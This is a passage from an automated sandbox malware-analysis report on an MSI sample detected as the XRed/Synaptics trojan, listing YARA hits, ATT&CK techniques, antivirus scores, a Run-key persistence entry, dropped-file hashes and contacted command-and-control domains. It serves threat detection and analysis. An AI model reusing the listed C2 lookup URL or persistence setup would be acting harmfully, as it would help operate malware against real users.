                          Source: Amcache.hve.12.dr, Binary or memory string: VMware VMCI Bus Device
                          Source: Amcache.hve.12.dr, Binary or memory string: VMware Virtual RAM
                          Source: Amcache.hve.12.dr, Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                          Source: Amcache.hve.12.dr, Binary or memory string: vmci.inf_amd64_68ed49469341f563
                          Source: C:\Windows\System32\msiexec.exe, Process information queried: ProcessInformation
                          Source: C:\Windows\Installer\MSID754.tmp, Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                          Source: C:\Windows\System32\msiexec.exe, Queries volume information: C:\ VolumeInformation
                          Source: Amcache.hve.12.dr, Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                          Source: Amcache.hve.12.dr, Binary or memory string: msmpeng.exe
                          Source: Amcache.hve.12.dr, Binary or memory string: c:\program files\windows defender\msmpeng.exe
                          Source: Amcache.hve.12.dr, Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                          Source: Amcache.hve.12.dr, Binary or memory string: MsMpEng.exe

                          Stealing of Sensitive Information

                          Source: Yara match, File source: xyxmml.msi, type: SAMPLE
                          Source: Yara match, File source: 3.0.MSID754.tmp.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 00000003.00000000.1324128268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match, File source: Process Memory Space: MSID754.tmp PID: 7108, type: MEMORYSTR
                          Source: Yara match, File source: C:\Windows\Installer\63d57e.msi, type: DROPPED
                          Source: Yara match, File source: C:\Windows\Installer\MSID6D6.tmp, type: DROPPED
                          Source: Yara match, File source: C:\ProgramData\Synaptics\RCXDBF7.tmp, type: DROPPED
                          Source: Yara match, File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                          Source: Yara match, File source: C:\Users\user\Documents\~$cache1, type: DROPPED
                          Source: Yara match, File source: C:\Windows\Installer\MSID754.tmp, type: DROPPED

                          Remote Access Functionality

                          Source: Yara match, File source: xyxmml.msi, type: SAMPLE
                          Source: Yara match, File source: 3.0.MSID754.tmp.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match, File source: 00000003.00000000.1324128268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match, File source: Process Memory Space: MSID754.tmp PID: 7108, type: MEMORYSTR
                          Source: Yara match, File source: C:\Windows\Installer\63d57e.msi, type: DROPPED
                          Source: Yara match, File source: C:\Windows\Installer\MSID6D6.tmp, type: DROPPED
                          Source: Yara match, File source: C:\ProgramData\Synaptics\RCXDBF7.tmp, type: DROPPED
                          Source: Yara match, File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                          Source: Yara match, File source: C:\Users\user\Documents\~$cache1, type: DROPPED
                          Source: Yara match, File source: C:\Windows\Installer\MSID754.tmp, type: DROPPED

                          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                          Gather Victim Identity Information | 41 Scripting | 2 Replication Through Removable Media | Windows Management Instrumentation | 41 Scripting | 11 Process Injection | 132 Masquerading | OS Credential Dumping | 111 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                          Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Registry Run Keys / Startup Folder | 1 Registry Run Keys / Startup Folder | 11 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                          Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Process Injection | Security Account Manager | 11 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Extra Window Memory Injection | 1 Obfuscated Files or Information | NTDS | 11 Peripheral Device Discovery | Distributed Component Object Model | Input Capture | 34 Application Layer Protocol | Traffic Duplication | Data Destruction
                          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 3 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 File Deletion | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Extra Window Memory Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

                          [Behavior graph: Behavior Graph ID: 1582349, Sample: xyxmml.msi, Startdate: 30/12/2024, Architecture: WINDOWS, Score: 100]

                          Source | Detection | Scanner | Label
                          xyxmml.msi | 66% | ReversingLabs | Win32.Trojan.Synaptics

                          Source | Detection | Scanner | Label
                          C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | TR/Dldr.Agent.SH
                          C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | W2000M/Dldr.Agent.17651006
                          C:\Users\user\Documents\~$cache1 | 100% | Avira | TR/Dldr.Agent.SH
                          C:\Users\user\Documents\~$cache1 | 100% | Avira | W2000M/Dldr.Agent.17651006
                          C:\ProgramData\Synaptics\RCXDBF7.tmp | 100% | Avira | TR/Dldr.Agent.SH
                          C:\ProgramData\Synaptics\RCXDBF7.tmp | 100% | Avira | W2000M/Dldr.Agent.17651006
                          C:\Windows\Installer\MSID754.tmp | 100% | Avira | TR/Dldr.Agent.SH
                          C:\Windows\Installer\MSID754.tmp | 100% | Avira | W2000M/Dldr.Agent.17651006
                          C:\ProgramData\Synaptics\Synaptics.exe | 100% | Joe Sandbox ML |
                          C:\Users\user\Documents\~$cache1 | 100% | Joe Sandbox ML |
                          C:\ProgramData\Synaptics\RCXDBF7.tmp | 100% | Joe Sandbox ML |
                          C:\Windows\SysWOW64\._cache_MSID754.tmp | 100% | Joe Sandbox ML |
                          C:\Windows\Installer\MSID754.tmp | 100% | Joe Sandbox ML |
                          C:\ProgramData\Synaptics\Synaptics.exe | 92% | ReversingLabs | Win32.Trojan.Synaptics
                          C:\Windows\Installer\MSID754.tmp | 92% | ReversingLabs | Win32.Trojan.Synaptics
                          C:\Windows\SysWOW64\._cache_MSID754.tmp | 50% | ReversingLabs | Win32.Trojan.Lisk
                          No Antivirus matches
                          Name | IP | Active | Malicious | Antivirus Detection | Reputation
                          freedns.afraid.org | 69.42.215.252 | true | false |  | high
                          docs.google.com | 142.250.186.78 | true | false |  | high
                          s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false |  | high
                          drive.usercontent.google.com | 142.250.185.161 | true | false |  | high
                          xred.mooo.com | unknown | unknown | false |  | high

                          Name | Malicious | Antivirus Detection | Reputation
                          xred.mooo.com | false |  | high
                          http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 | false |  | high
                                                                                                    IP | Domain | Country | ASN | ASN Name | Malicious
                                                                                                    142.250.186.78 | docs.google.com | United States | 15169 | GOOGLEUS | false
                                                                                                    142.250.185.161 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
                                                                                                    69.42.215.252 | freedns.afraid.org | United States | 17048 | AWKNET-LLCUS | false
                                                                                                    Joe Sandbox version: 41.0.0 Charoite
                                                                                                    Analysis ID: 1582349
                                                                                                    Start date and time: 2024-12-30 11:48:21 +01:00
                                                                                                    Joe Sandbox product: CloudBasic
                                                                                                    Overall analysis duration: 0h 5m 41s
                                                                                                    Hypervisor based Inspection enabled: false
                                                                                                    Report type: full
                                                                                                    Cookbook file name: defaultwindowsofficecookbook.jbs
                                                                                                    Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Run name: Without Instrumentation
                                                                                                    Number of analysed new started processes analysed: 19
                                                                                                    Number of new started drivers analysed: 0
                                                                                                    Number of existing processes analysed: 0
                                                                                                    Number of existing drivers analysed: 0
                                                                                                    Number of injected processes analysed: 0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode: default
                                                                                                    Analysis stop reason: Timeout
                                                                                                    Sample name: xyxmml.msi
                                                                                                    Detection: MAL
                                                                                                    Classification: mal100.troj.expl.evad.winMSI@11/42@4/3
                                                                                                    EGA Information: Failed
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 100%
                                                                                                    • Number of executed functions: 0
                                                                                                    • Number of non-executed functions: 0
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .msi
                                                                                                    • Close Viewer
                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                    • Excluded IPs from analysis (whitelisted): 52.109.76.240, 184.28.90.27, 52.113.194.132, 52.168.117.171, 20.189.173.22, 13.107.246.45, 40.126.32.133, 4.245.163.56
                                                                                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, onedsblobprdwus17.westus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, onedscolprdeus16.eastus.cloudapp.azure.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, neu-azsc-config.officeapps.live.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                                    • Not all processes were analyzed, report is missing behavior information
                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                    • VT rate limit hit for: xyxmml.msi
                                                                                                    Time | Type | Description
                                                                                                    05:49:17 | API Interceptor | 68x Sleep call for process: Synaptics.exe modified
                                                                                                    05:49:38 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                                                                                    05:51:14 | API Interceptor | 18x Sleep call for process: splwow64.exe modified
                                                                                                    10:49:14 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                                                                    69.42.215.252 | valyzt.msi | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                    69.42.215.252 | VKKDXE.exe | malicious | LodaRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                    69.42.215.252 | New PO - Supplier 16-12-2024-Pdf.exe | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                    69.42.215.252 | Supplier.bat | malicious | LodaRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                    69.42.215.252 | Purchase-Order.exe | malicious | LodaRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                    69.42.215.252 | FGNEBI.exe | malicious | LodaRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                    69.42.215.252 | docx.msi | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                    69.42.215.252 | hoaiuy.msi | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                    69.42.215.252 | 222.msi | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                    69.42.215.252 | LWQDFZ.exe | malicious | LodaRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
Match | Associated Sample Name / URL | Detection | Threat Name | Context
s-part-0017.t-0009.t-msedge.net | valyzt.msi | malicious | XRed | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | Purchase-Order.exe | malicious | LodaRAT, XRed | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | FGNEBI.exe | malicious | LodaRAT, XRed | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | sdlvrr.msi | malicious | LodaRAT | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | docx.msi | malicious | XRed | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | hoaiuy.msi | malicious | XRed | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | 222.msi | malicious | XRed | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | KOGJZW.exe | malicious | LodaRAT, XRed | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | Machine-PO.exe | malicious | XRed | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | universityform.xlsm | malicious | Unknown | 13.107.246.45
freedns.afraid.org | valyzt.msi | malicious | XRed | 69.42.215.252
freedns.afraid.org | VKKDXE.exe | malicious | LodaRAT, XRed | 69.42.215.252
freedns.afraid.org | New PO - Supplier 16-12-2024-Pdf.exe | malicious | XRed | 69.42.215.252
freedns.afraid.org | Supplier.bat | malicious | LodaRAT, XRed | 69.42.215.252
freedns.afraid.org | Purchase-Order.exe | malicious | LodaRAT, XRed | 69.42.215.252
freedns.afraid.org | FGNEBI.exe | malicious | LodaRAT, XRed | 69.42.215.252
freedns.afraid.org | docx.msi | malicious | XRed | 69.42.215.252
freedns.afraid.org | hoaiuy.msi | malicious | XRed | 69.42.215.252
freedns.afraid.org | 222.msi | malicious | XRed | 69.42.215.252
freedns.afraid.org | LWQDFZ.exe | malicious | LodaRAT, XRed | 69.42.215.252
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AWKNET-LLCUS | valyzt.msi | malicious | XRed | 69.42.215.252
AWKNET-LLCUS | VKKDXE.exe | malicious | LodaRAT, XRed | 69.42.215.252
AWKNET-LLCUS | New PO - Supplier 16-12-2024-Pdf.exe | malicious | XRed | 69.42.215.252
AWKNET-LLCUS | Supplier.bat | malicious | LodaRAT, XRed | 69.42.215.252
AWKNET-LLCUS | Purchase-Order.exe | malicious | LodaRAT, XRed | 69.42.215.252
AWKNET-LLCUS | FGNEBI.exe | malicious | LodaRAT, XRed | 69.42.215.252
AWKNET-LLCUS | docx.msi | malicious | XRed | 69.42.215.252
AWKNET-LLCUS | hoaiuy.msi | malicious | XRed | 69.42.215.252
AWKNET-LLCUS | 222.msi | malicious | XRed | 69.42.215.252
AWKNET-LLCUS | LWQDFZ.exe | malicious | LodaRAT, XRed | 69.42.215.252
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | valyzt.msi | malicious | XRed | 142.250.186.78, 142.250.185.161
37f463bf4616ecd445d4a1937da06e19 | VKKDXE.exe | malicious | LodaRAT, XRed | 142.250.186.78, 142.250.185.161
37f463bf4616ecd445d4a1937da06e19 | New PO - Supplier 16-12-2024-Pdf.exe | malicious | XRed | 142.250.186.78, 142.250.185.161
37f463bf4616ecd445d4a1937da06e19 | Supplier.bat | malicious | LodaRAT, XRed | 142.250.186.78, 142.250.185.161
37f463bf4616ecd445d4a1937da06e19 | Purchase-Order.exe | malicious | LodaRAT, XRed | 142.250.186.78, 142.250.185.161
37f463bf4616ecd445d4a1937da06e19 | FGNEBI.exe | malicious | LodaRAT, XRed | 142.250.186.78, 142.250.185.161
37f463bf4616ecd445d4a1937da06e19 | docx.msi | malicious | XRed | 142.250.186.78, 142.250.185.161
37f463bf4616ecd445d4a1937da06e19 | hoaiuy.msi | malicious | XRed | 142.250.186.78, 142.250.185.161
37f463bf4616ecd445d4a1937da06e19 | 222.msi | malicious | XRed | 142.250.186.78, 142.250.185.161
37f463bf4616ecd445d4a1937da06e19 | LWQDFZ.exe | malicious | LodaRAT, XRed | 142.250.186.78, 142.250.185.161
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\ProgramData\Synaptics\RCXDBF7.tmp | KOGJZW.exe | malicious | LodaRAT, XRed |
C:\Users\user\Documents\~$cache1 | KOGJZW.exe | malicious | LodaRAT, XRed |
                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                        File Type:data
                                                                                                        Category:modified
                                                                                                        Size (bytes):623
                                                                                                        Entropy (8bit):5.283563461763612
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:Egmg8mmIdFiS/cqj//pFvfN2zWotHMphe2WmmY3HDyzgj8Q:+gTuSkqjM65ptyzAL
                                                                                                        MD5:780AEDA1A128DF4E8E9B58620FD7EEED
                                                                                                        SHA1:E0C79D727C499CAC837330202DB7F3406D140E86
                                                                                                        SHA-256:5C033E877DB0561BCBACEE9AD9DC134A8ED346BC12ADE43C658DF5D0A1EB7328
                                                                                                        SHA-512:B711072723059307E49ACDB1D026C2D36C85806B49CDEF498408BE6F0FA75A7AB414788A86FFC8731BAF3DD9E670F31FD6581897CEEBADD41BB70B006086732D
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):118
                                                                                                        Entropy (8bit):3.5700810731231707
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                        MD5:573220372DA4ED487441611079B623CD
                                                                                                        SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                        SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                        SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                        Malicious:false
                                                                                                        Reputation:high, very likely benign file
                                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?> <HeartbeatCache/>
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):65536
                                                                                                        Entropy (8bit):1.1334144360839697
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:BL7VpsZImL0jMNtDzJDzqjLOA/ytzxwzuiFjZ24IO8EKDzy:zyZyjMNtJqj8KzuiFjY4IO8zy
                                                                                                        MD5:8846FFAAB60E56F3F79A0440CD9AB345
                                                                                                        SHA1:1B20569172A16836DDA55F80C7D48222B6656120
                                                                                                        SHA-256:30797138E43865AA0E27EF7E521682E41AC4F07B686F452A10ED9AA0C3B46AA8
                                                                                                        SHA-512:E7F325E7198A054AF986F89BDEEFCC2341B9BADF3BB7BAB9EE263EF74807DA009943C09D0AF21095FDDDBDB7B93173BDDA387B01EE64B39762E360F265E8A67E
                                                                                                        Malicious:false
                                                                                                        Preview:Version=1 EventType=APPCRASH EventTime=133800293648998529 ReportType=2 Consent=1 UploadTime=133800293676186030 ReportStatus=524384 ReportIdentifier=84795679-79ec-489f-8b3a-d27896ceee5e IntegratorReportIdentifier=1aa30405-8483-47cb-b145-01e06d4f1dd5 Wow64Host=34404 Wow64Guest=332 NsAppName=Synaptics.exe AppSessionGuid=00000550-0001-0014-c9c7-1176a85adb01 TargetAppId=W:0006b99a137d593dda9d158dc8b6b7720deb00001f04!0000a35d73e54e4ba166ac30889f57fa58284881102a!Synaptics.exe TargetAppVe
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):6302
                                                                                                        Entropy (8bit):3.7180671272396433
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:R6l7wVeJLx66TYiSj6ZOpDy89b/Wsf31m:R6lXJo6TYbo4/1fo
                                                                                                        MD5:0B665C4D1AE44DDA2783AEDB6AB09D81
                                                                                                        SHA1:D5CD9FFCE42786061EBBB77056478BC8EF8ECE0E
                                                                                                        SHA-256:8CB73C4F86FB4CBA0E92AB072CF6A77F9100B7AA5F0E1FDC539FD8B14C668ABE
                                                                                                        SHA-512:71CD836CD32D61706D619CEC6C210BFD05240DE0D45F382037DC1ADF87A011ABE8E4A15352D0DFAECA400A47198377C8579D711E3FCFE68E64D399A33D657E3E
                                                                                                        Malicious:false
                                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>1360</Pi
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4572
                                                                                                        Entropy (8bit):4.44513213281774
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:cvIwWl8zsBJg77aI9Wk0WpW8VY42Ym8M4JFTFcI+q84UTSZUd:uIjfTI70kt7VdJ0ISTSZUd
                                                                                                        MD5:962EF1177447DB9FF087667887BD7752
                                                                                                        SHA1:02657689C6DA88C6AE56CA36C657DC2700315F52
                                                                                                        SHA-256:51364D0194712AE448BC52BB4EC57E5E8CF9DC16BA10348B4E0C41FFF9FE6538
                                                                                                        SHA-512:D9C04E27A73ED62122BF1FDDA759EF2652C351B9387BA98C81B4AD3C43230C2D0326E04A2ED9C1503527E5BC7A1BE86CEB55E6431EEB75354BB1A02CA5D6874A
                                                                                                        Malicious:false
                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653872" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:Mini DuMP crash report, 14 streams, Mon Dec 30 10:49:25 2024, 0x1205a4 type
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1740606
                                                                                                        Entropy (8bit):1.7239167895966154
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:Zjy/QeHv2hydTgiaWCiQLSCxAB5e6MZy+gVMm/bXjVfXzmA:ZjyYG2hydTg9WXB5epy+gymrjg
                                                                                                        MD5:21B9ABBA9777FBA049FEDC05F34DC2A4
                                                                                                        SHA1:8F1430D02A90127B9060284E12E76EA9047BB1E3
                                                                                                        SHA-256:4CDA2619D56FDFA8A518515BD46BDDAE61343C4425A549C48899FE677BE5BE71
                                                                                                        SHA-512:6DD34A5A7799D01FAEE8816AD86EAC0B43AB84F4122B4C4EA02782B5B1EA198FFD1D2A5D1A71410FF2F47758B8164A960864BF8D388F66E941D623643456303E
                                                                                                        Malicious:false
                                                                                                        Process:C:\Windows\Installer\MSID754.tmp
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):771584
                                                                                                        Entropy (8bit):6.6408899377896855
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Imr:ansJ39LyjbJkQFMhmC+6GD9p
                                                                                                        MD5:7103F3EEC43BBABE34068295157F9F1C
                                                                                                        SHA1:A35D73E54E4BA166AC30889F57FA58284881102A
                                                                                                        SHA-256:2B6DB5563D77C827F5A662CB0A05359450DB29948863F9A5556C19CE14D05305
                                                                                                        SHA-512:F8A257ABA57A1EACF8F280651E74F97D2E14F326139282ABB506764C95FB57DB9C4708BAFD1AC027B030C40A866BE2BD04B3B0BFAC82F748B147E8A17DBD7188
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCXDBF7.tmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCXDBF7.tmp, Author: Joe Security
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Joe Sandbox View:
                                                                                                        • Filename: KOGJZW.exe, Detection: malicious, Browse
                                                                                                        Process:C:\Windows\Installer\MSID754.tmp
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1729536
                                                                                                        Entropy (8bit):7.489873659196219
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:49152:snsHyjtk2MYC5GDChloJfWJ255hpB14RdZ:snsmtk2arhlTJ23hg
                                                                                                        MD5:1D2237FAF8E6198625010CB580280901
                                                                                                        SHA1:592449BDDF763BB63C22F638CB42F71484F87F06
                                                                                                        SHA-256:78643B903379276085C5EF0092AFC5C10DEE821C5754E01BC8EF835907B16AC4
                                                                                                        SHA-512:8ABE1FF967D92C663080CAF54F315E534EA296C91474D66CD327DCCC38A3AA8685101649BB120E28F1438011596DDE4F2F83E8150C90D51529EFCE9906A5AA0B
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        File Type:Microsoft Excel 2007+
                                                                                                        Category:dropped
                                                                                                        Size (bytes):18387
                                                                                                        Entropy (8bit):7.523057953697544
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                        MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                        SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                        SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
